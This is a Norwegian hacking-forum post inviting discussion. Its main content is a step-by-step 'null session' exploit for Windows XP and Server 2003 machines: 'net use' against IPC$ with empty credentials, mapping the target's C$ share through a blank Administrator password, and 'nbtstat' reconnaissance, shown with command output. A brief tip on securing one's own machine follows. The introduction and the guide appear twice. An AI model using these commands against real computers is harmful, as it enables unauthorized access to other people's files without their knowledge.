Freakforum var en gang i tiden et undergrunnsforum hvor man bortimot bare diskuterte hacking og datasikkerhet, fildeling, rusmiddel og pyroteknikk, men nå har det blomstret og blitt så mye mer. Skribenter som ranvik, som vet å gjøre det oldschool, og slashdot, med moralpreken og sine kjente ord om datasikkerhet gir forumet et stort hev, men jeg må ærlig si at den førstnevnte biten, hacking og datasikkerhet, er noe jeg savner mer av her inne, selv om at det fortsatt er et område som er aktivt og oppegående.
TipeX har tidligere skrevet en fin grunnlegende artikkel om hva hacking er og hva det går ut på, så for å hoppe over en del steg kan én lese denne artikkelen først dersom en er usikker - noe jeg sterkt tviler på.
Årsaken til at jeg tar opp denne debatten er fordi jeg vil se hvor mange som engasjerer seg i dette, hvor mange som har noe å si om området eller kanskje er eller har vært borti noe som kan være værdt å ta opp til diskusjon, samt at det ofte kommer sikkerhetsoppdateringer til operativsystemet i seg selv som skal tette nylig funnet hull - noe jeg kom til å tenke på når jeg tidligere i dag skrev litt om et litt eldre problem, eller en svakhet, i Windows som nesten gir hvem som helst tilgang til hva som helst på Pcen din (jeg har tatt dette med nedenfor som et eksempel på hva vi kan diskutere her inne)
PS! Selv om at sikkerhetshull er enkelt å utnytte er det ikke lov, så all bruk er på eget ansvar.
Null Session - ta kontroll
Type: Exploit / Sikkerhetshull / En svakhet i et program.
Forrord: Såfremt du vet IP på målmaskin kan du prøve dette. Vet du maskinnavn kan du kjøre én ping for å få IP-adressen opp. Dette fungerer ikke mot nyere operativsystem enn Windows XP eller Server 2003 - Vista og Win7 til eksempel tillater ikke bruk av Administrator bruker utenom sikkerhetsmodus, så der har de "løst" problemet. De som installerer XP har til vane å ikke taste inn passord på Administratorbrukeren, så den blir stående åpen og støver til noen benytter seg av den, slik som jeg har vist nå. Målmaskinen må også ha lagt til tjenesten for deling av filer, mapper og skrivere.
Hvordan.
Vi hyller vår gud: Command prompt. Og gir mye av æren til kommandoen NET som gir deg den tilgangen du søker, uten at vedkommende på målmaskinen vet noe om dette.
Se følgende eksempel:
Så enkelt kan det være. Du kan altså teste annet enn c$ også, men dersom målmaskinen ikke har mer enn c-partisjon på PCen sin vil du ikke få tilgang til annet, men finns det får du full tilgang via nettverksstasjonen du har opprettet - skummelt, men sant.
Sjekk målmaskinen
Du kan se om målmaskin har tjenesten for deling av filer, mapper og skrivere aktivert ved å benytte "nbtstat -a målmaskin" eller "nbtstat -A IP". HEX 20 under type er betegnelsen på deling av filer, mapper og skrivere.
Dersom målmaskinen faktisk er sikret med passord på Administrator brukeren eller har endret navn på den (ja, det går an) kan du møte på problemstilling som dette.
Problemstilling
Din sikkerhet
Hvis du vil se hva du selv har delt kan du skrive net share, da ser du også alle hemmelige mapper/stasjoner (markert med $):
Så bare se til at du har passord på brukeren administrator for å sikre deg at dette ikke skjer. Brannmur skal også være til hjelp, men man vet jo aldri.
Tilbake til poenget - kjør debatt!
TipeX har tidligere skrevet en fin grunnlegende artikkel om hva hacking er og hva det går ut på, så for å hoppe over en del steg kan én lese denne artikkelen først dersom en er usikker - noe jeg sterkt tviler på.
Årsaken til at jeg tar opp denne debatten er fordi jeg vil se hvor mange som engasjerer seg i dette, hvor mange som har noe å si om området eller kanskje er eller har vært borti noe som kan være værdt å ta opp til diskusjon, samt at det ofte kommer sikkerhetsoppdateringer til operativsystemet i seg selv som skal tette nylig funnet hull - noe jeg kom til å tenke på når jeg tidligere i dag skrev litt om et litt eldre problem, eller en svakhet, i Windows som nesten gir hvem som helst tilgang til hva som helst på Pcen din (jeg har tatt dette med nedenfor som et eksempel på hva vi kan diskutere her inne)
PS! Selv om at sikkerhetshull er enkelt å utnytte er det ikke lov, så all bruk er på eget ansvar.
Null Session - ta kontroll
Type: Exploit / Sikkerhetshull / En svakhet i et program.
Forrord: Såfremt du vet IP på målmaskin kan du prøve dette. Vet du maskinnavn kan du kjøre én ping for å få IP-adressen opp. Dette fungerer ikke mot nyere operativsystem enn Windows XP eller Server 2003 - Vista og Win7 til eksempel tillater ikke bruk av Administrator bruker utenom sikkerhetsmodus, så der har de "løst" problemet. De som installerer XP har til vane å ikke taste inn passord på Administratorbrukeren, så den blir stående åpen og støver til noen benytter seg av den, slik som jeg har vist nå. Målmaskinen må også ha lagt til tjenesten for deling av filer, mapper og skrivere.
Hvordan.
Vi hyller vår gud: Command prompt. Og gir mye av æren til kommandoen NET som gir deg den tilgangen du søker, uten at vedkommende på målmaskinen vet noe om dette.
Se følgende eksempel:
Kode
C:\>net use \\målmaskin\IPC$ "" /u:"" Kommandoen er fullført. C:\>net use * \\Målmaskin\c$ Passordet for \\Målmaskin\c$ er ugyldig. Angi brukernavn for Målmaskin: Administrator Angi passordet for Målmaskin: <blank> Stasjon E: er nå koblet til \\Målmaskin\c$. Kommandoen er fullført.
Sjekk målmaskinen
Du kan se om målmaskin har tjenesten for deling av filer, mapper og skrivere aktivert ved å benytte "nbtstat -a målmaskin" eller "nbtstat -A IP". HEX 20 under type er betegnelsen på deling av filer, mapper og skrivere.
Kode
C:\>nbtstat -A IP Lokal tilkobling: Node-IP-adresse: [DIN_IP] Område-ID: [] Navnetabell for ekstern maskin for NetBIOS Navn Type Status ---------------------------------------------- PCNAVN <20> UNIQUE Registrert PCNAVN <00> UNIQUE Registrert DOMENE/ARBEIDSGRUPPE <00> GROUP Registrert DOMENE/ARBEIDSGRUPPE <1E> GROUP Registrert MAC-adresse = 00-00-00-00-00-00
Problemstilling
Kode
Systemfeil 1326 har oppstått. Påloggingsfeil: ukjent brukernavn eller feil passord.
Hvis du vil se hva du selv har delt kan du skrive net share, da ser du også alle hemmelige mapper/stasjoner (markert med $):
Kode
C:\>net share Navn Ressurs Kommentar ------------------------------------------------------------------------------- D$ D:\ Delt standardressurs ADMIN$ C:\WINDOWS Ekstern administrasjon C$ C:\ Delt standardressurs IPC$ Ekstern IPC Kommandoen er fullført.
Tilbake til poenget - kjør debatt!